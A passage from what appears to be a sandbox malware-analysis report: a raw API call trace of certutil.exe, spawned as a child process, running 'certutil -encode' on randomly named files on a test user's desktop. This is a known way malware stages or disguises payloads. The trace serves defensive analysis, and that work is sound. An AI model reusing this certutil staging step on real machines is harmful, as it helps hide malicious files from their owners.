(hMem=0x22179c2b620) returned 0x0 [0217.765] LocalFree (hMem=0x22179c41020) returned 0x0 [0217.765] LocalFree (hMem=0x0) returned 0x0 [0217.765] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0217.765] GetLastError () returned 0x7e [0217.766] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0217.766] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0217.766] DllMain () returned 0x1 [0217.766] LocalFree (hMem=0x22179c2b960) returned 0x0 [0217.766] LocalFree (hMem=0x22179c223b0) returned 0x0 [0217.766] LocalFree (hMem=0x22179c41560) returned 0x0 [0217.766] LocalFree (hMem=0x22179c410b0) returned 0x0 [0217.766] LocalFree (hMem=0x22179c18830) returned 0x0 [0217.766] LocalFree (hMem=0x22179c41440) returned 0x0 [0217.766] LocalFree (hMem=0x22179c247a0) returned 0x0 [0217.766] LocalFree (hMem=0x22179c21fc0) returned 0x0 [0217.766] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0217.766] GetLastError () returned 0x7e [0217.767] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0217.767] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0217.767] DllMain () returned 0x1 [0217.767] exit (_Code=0) Thread: id = 41 os_tid = 0x12a4 Process: id = "12" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x9d33000" os_pid = "0x1324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0x1328 [0219.643] GetStartupInfoW (in: lpStartupInfo=0xc9ceadfb40 | out: lpStartupInfo=0xc9ceadfb40*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0219.645] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0219.645] __set_app_type (_Type=0x1) [0219.645] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0219.645] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0219.648] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0219.648] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0219.649] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0219.649] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0219.649] WerSetFlags () returned 0x0 [0219.649] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.649] __iob_func () returned 0x7ffcea2dea00 [0219.649] _fileno (_File=0x7ffcea2dea30) returned 1 [0219.649] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0219.650] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0219.651] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0219.651] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0219.651] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0219.651] GetConsoleOutputCP () returned 0x1b5 [0219.662] _vsnwprintf (in: _Buffer=0xc9ceadfab0, _BufferCount=0xb, _Format=".%d", _ArgList=0xc9ceadf9d8 | out: _Buffer=".437") returned 4 [0219.662] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0219.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.662] GetFileType (hFile=0x50) returned 0x2 [0219.662] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0219.662] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0219.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.663] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0219.663] GetCommandLineW () returned="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"" [0219.663] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x260d41bc1e0 [0219.663] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x260d41b3990 [0219.663] LocalFree (hMem=0x260d41bc1e0) returned 0x0 [0219.663] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x260d41aa190 [0219.663] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x260d41b53d0 [0219.663] LocalFree (hMem=0x260d41aa190) returned 0x0 [0219.663] LocalFree (hMem=0x260d41b3990) returned 0x0 [0219.663] LocalFree (hMem=0x0) returned 0x0 [0219.664] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0219.664] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0219.664] GetCommandLineW () returned="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"" [0219.664] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x260d41bc660 [0219.664] GetSystemTime (in: lpSystemTime=0xc9ceadf7a0 | out: lpSystemTime=0xc9ceadf7a0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x36, wMilliseconds=0xcd)) [0219.664] SystemTimeToFileTime (in: lpSystemTime=0xc9ceadf7a0, lpFileTime=0xc9ceadf798 | out: lpFileTime=0xc9ceadf798) returned 1 [0219.664] FileTimeToLocalFileTime (in: lpFileTime=0xc9ceadf798, lpLocalFileTime=0xc9ceadf760 | out: lpLocalFileTime=0xc9ceadf760) returned 1 [0219.664] FileTimeToSystemTime (in: lpFileTime=0xc9ceadf760, lpSystemTime=0xc9ceadf4d0 | out: lpSystemTime=0xc9ceadf4d0) returned 1 [0219.664] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xc9ceadf4d0, lpFormat=0x0, lpDateStr=0xc9ceadf5e0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0219.665] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xc9ceadf4d0, lpFormat=0x0, lpTimeStr=0xc9ceadf4e0, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0219.665] _vsnwprintf (in: _Buffer=0xc9ceadf4ee, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xc9ceadf4b8 | out: _Buffer=" 54.205s") returned 8 [0219.665] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x260d41bf2e0 [0219.665] SetLastError (dwErrCode=0x80070716) [0219.665] _vsnwprintf (in: _Buffer=0xc9ceadf568, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf558 | out: _Buffer="948") returned 3 [0219.665] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xc9ceadf320, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0219.665] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x260d41bc580 [0219.665] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x260d41b2c90 [0219.665] LocalFree (hMem=0x260d41bf2e0) returned 0x0 [0219.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc9ceadf810 | out: lpSystemTimeAsFileTime=0xc9ceadf810*(dwLowDateTime=0xad8a2f62, dwHighDateTime=0x1d6141f)) [0219.665] GetLocalTime (in: lpSystemTime=0xc9ceadf848 | out: lpSystemTime=0xc9ceadf848*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x36, wMilliseconds=0xce)) [0219.665] SystemTimeToFileTime (in: lpSystemTime=0xc9ceadf848, lpFileTime=0xc9ceadf820 | out: lpFileTime=0xc9ceadf820) returned 1 [0219.665] CompareFileTime (lpFileTime1=0xc9ceadf820, lpFileTime2=0xc9ceadf810) returned 1 [0219.666] _vsnwprintf (in: _Buffer=0xc9ceadf858, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xc9ceadf7e8 | out: _Buffer="GMT + 2.00") returned 10 [0219.666] LocalFree (hMem=0x260d41bc660) returned 0x0 [0219.666] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffccc870000 [0219.666] FindResourceW (hModule=0x7ffccc870000, lpName=0x1, lpType=0x10) returned 0x7ffccc930090 [0219.666] LoadResource (hModule=0x7ffccc870000, hResInfo=0x7ffccc930090) returned 0x7ffccc9300b0 [0219.666] LockResource (hResData=0x7ffccc9300b0) returned 0x7ffccc9300b0 [0219.666] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0219.666] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xc9ceadf888 | out: _Buffer="10.0.15063.447") returned 14 [0219.666] GetACP () returned 0x4e4 [0219.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0219.666] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x260d41bc2e0 [0219.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x260d41bc2e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0219.666] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x260d41bf3e0 [0219.666] _vsnwprintf (in: _Buffer=0x260d41bf3e0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xc9ceadf8d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0219.666] LocalFree (hMem=0x260d41bc2e0) returned 0x0 [0219.667] LocalFree (hMem=0x0) returned 0x0 [0219.667] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0219.667] GetACP () returned 0x4e4 [0219.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0219.667] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x260d41bc2a0 [0219.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x260d41bc2a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0219.667] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x260d41bf1e0 [0219.667] _vsnwprintf (in: _Buffer=0x260d41bf1e0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xc9ceadf8d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0219.667] LocalFree (hMem=0x260d41bc2a0) returned 0x0 [0219.667] LocalFree (hMem=0x0) returned 0x0 [0219.667] GetACP () returned 0x4e4 [0219.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0219.667] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x260d41bc280 [0219.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x260d41bc280, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0219.667] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x260d41bf060 [0219.667] _vsnwprintf (in: _Buffer=0x260d41bf060, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xc9ceadf908 | out: _Buffer="10.0.15063.447 retail") returned 21 [0219.667] LocalFree (hMem=0x260d41bc280) returned 0x0 [0219.667] LocalFree (hMem=0x260d41bf3e0) returned 0x0 [0219.668] LocalFree (hMem=0x260d41bf1e0) returned 0x0 [0219.668] LocalFree (hMem=0x260d41bf060) returned 0x0 [0219.668] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0219.668] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0219.668] GetStockObject (i=0) returned 0x900010 [0219.668] RegisterClassW (lpWndClass=0xc9ceadfa30) returned 0xc1a2 [0219.668] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1502be [0219.684] NtdllDefWindowProc_W () returned 0x0 [0219.685] NtdllDefWindowProc_W () returned 0x1 [0219.693] NtdllDefWindowProc_W () returned 0x0 [0219.701] UpdateWindow (hWnd=0x1502be) returned 1 [0219.701] PostMessageW (hWnd=0x1502be, Msg=0x400, wParam=0x0, lParam=0x260d41a217e) returned 1 [0219.701] GetMessageW (in: lpMsg=0xc9ceadfa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xc9ceadfa80) returned 1 [0219.701] TranslateMessage (lpMsg=0xc9ceadfa80) returned 0 [0219.701] DispatchMessageW (lpMsg=0xc9ceadfa80) returned 0x0 [0219.701] NtdllDefWindowProc_W () returned 0x0 [0219.701] GetMessageW (in: lpMsg=0xc9ceadfa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xc9ceadfa80) returned 1 [0219.701] TranslateMessage (lpMsg=0xc9ceadfa80) returned 0 [0219.701] DispatchMessageW (lpMsg=0xc9ceadfa80) returned 0x0 [0219.701] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x260d41a4440 [0219.702] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x260d41ac090 [0219.702] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0219.702] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0219.702] SetLastError (dwErrCode=0x80070716) [0219.702] _vsnwprintf (in: _Buffer=0xc9ceadf488, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf478 | out: _Buffer="465") returned 3 [0219.702] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xc9ceadf240, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0219.702] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x260d41b5070 [0219.702] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0219.702] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0219.702] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xc9ceadf220, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0219.702] GetLastError () returned 0xcb [0219.703] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0219.703] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0219.703] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0219.703] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0219.703] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0219.703] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0219.703] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0219.703] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0219.703] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0219.703] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0219.703] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0219.703] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0219.703] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0219.703] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0219.703] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0219.703] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0219.703] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0219.703] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0219.703] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0219.703] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0219.703] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0219.703] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xc9ceadeee8 | out: phkResult=0xc9ceadeee8*=0x23c) returned 0x0 [0219.703] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x260d41adef0 [0219.703] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xc9ceadf458, lpData=0xc9ceadf488, lpcbData=0xc9ceadf450*=0x4 | out: lpType=0xc9ceadf458*=0x0, lpData=0xc9ceadf488*=0x0, lpcbData=0xc9ceadf450*=0x4) returned 0x2 [0219.703] LocalFree (hMem=0x260d41adef0) returned 0x0 [0219.703] RegCloseKey (hKey=0x23c) returned 0x0 [0219.703] LocalFree (hMem=0x0) returned 0x0 [0219.704] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x260d41cd490 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0219.718] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0219.718] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0219.718] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x260d41cbae0 [0219.718] GetComputerNameW (in: lpBuffer=0x260d41cbae0, nSize=0xc9ceadf450 | out: lpBuffer="NQDPDE", nSize=0xc9ceadf450) returned 1 [0219.719] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xc9ceadf420 | out: lpBuffer=0x0, nSize=0xc9ceadf420) returned 0 [0219.719] GetLastError () returned 0xea [0219.719] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x260d41bc2c0 [0219.719] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x260d41bc2c0, nSize=0xc9ceadf420 | out: lpBuffer="NQdPdE", nSize=0xc9ceadf420) returned 1 [0219.719] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0219.724] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x260d41d2dd0, cbCertEncoded=0x1395e) returned 0x0 [0219.730] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x260d41d2dd0, cbCrlEncoded=0x1395e) returned 0x0 [0219.732] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x260d41d2dd0, cbEncoded=0x1395e, dwFlags=0x8000, pDecodePara=0xc9ceadf300, pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384 | out: pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384) returned 0 [0219.733] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x260d41d2dd0, cbEncoded=0x1395e, dwFlags=0x8000, pDecodePara=0xc9ceadf300, pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384 | out: pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384) returned 0 [0219.733] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x260d41d2dd0, cbEncoded=0x1395e, dwFlags=0x8000, pDecodePara=0xc9ceadf300, pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384 | out: pvStructInfo=0xc9ceadf390, pcbStructInfo=0xc9ceadf384) returned 0 [0219.733] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x260d41ae790 [0219.741] CryptMsgUpdate (hCryptMsg=0x260d41ae790, pbData=0x260d41d2dd0, cbData=0x1395e, fFinal=1) returned 0 [0219.741] GetLastError () returned 0x8009310b [0219.742] CryptMsgClose (hCryptMsg=0x260d41ae790) returned 1 [0219.742] GetFileAttributesExW (in: lpFileName="6uAkPGvRw81680a_RZ.m4a.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a.sister"), fInfoLevelId=0x0, lpFileInformation=0xc9ceadf3b0 | out: lpFileInformation=0xc9ceadf3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e)) returned 1 [0219.742] _vsnwprintf (in: _Buffer=0xc9ceadf3b8, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf3a8 | out: _Buffer="359") returned 3 [0219.742] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xc9ceadf170, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0219.742] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x260d41cb7e0 [0219.742] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.742] _vsnwprintf (in: _Buffer=0xc9ceade3a0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xc9ceadf3f8 | out: _Buffer="Input Length = 80222") returned 20 [0219.742] GetFileType (hFile=0x50) returned 0x2 [0219.742] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade3a0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xc9ceade354, lpReserved=0x0 | out: lpBuffer=0xc9ceade3a0*, lpNumberOfCharsWritten=0xc9ceade354*=0x14) returned 1 [0219.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.744] _vsnwprintf (in: _Buffer=0xc9ceade3a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xc9ceadf3f8 | out: _Buffer="\n") returned 1 [0219.744] GetFileType (hFile=0x50) returned 0x2 [0219.744] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade3a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xc9ceade354, lpReserved=0x0 | out: lpBuffer=0xc9ceade3a0*, lpNumberOfCharsWritten=0xc9ceade354*=0x1) returned 1 [0219.760] GetFileAttributesExW (in: lpFileName="6uAkPGvRw81680a_RZ.m4a.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a.cruel"), fInfoLevelId=0x0, lpFileInformation=0xc9ceadf3b0 | out: lpFileInformation=0xc9ceadf3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad974d2f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xad974d2f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xad989aad, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1af1c)) returned 1 [0219.761] _vsnwprintf (in: _Buffer=0xc9ceadf3b8, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf3a8 | out: _Buffer="361") returned 3 [0219.761] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xc9ceadf170, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0219.761] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x260d41cba20 [0219.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.761] _vsnwprintf (in: _Buffer=0xc9ceade3a0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xc9ceadf3f8 | out: _Buffer="Output Length = 110364") returned 22 [0219.761] GetFileType (hFile=0x50) returned 0x2 [0219.761] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade3a0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xc9ceade354, lpReserved=0x0 | out: lpBuffer=0xc9ceade3a0*, lpNumberOfCharsWritten=0xc9ceade354*=0x16) returned 1 [0219.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.761] _vsnwprintf (in: _Buffer=0xc9ceade3a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xc9ceadf3f8 | out: _Buffer="\n") returned 1 [0219.761] GetFileType (hFile=0x50) returned 0x2 [0219.761] 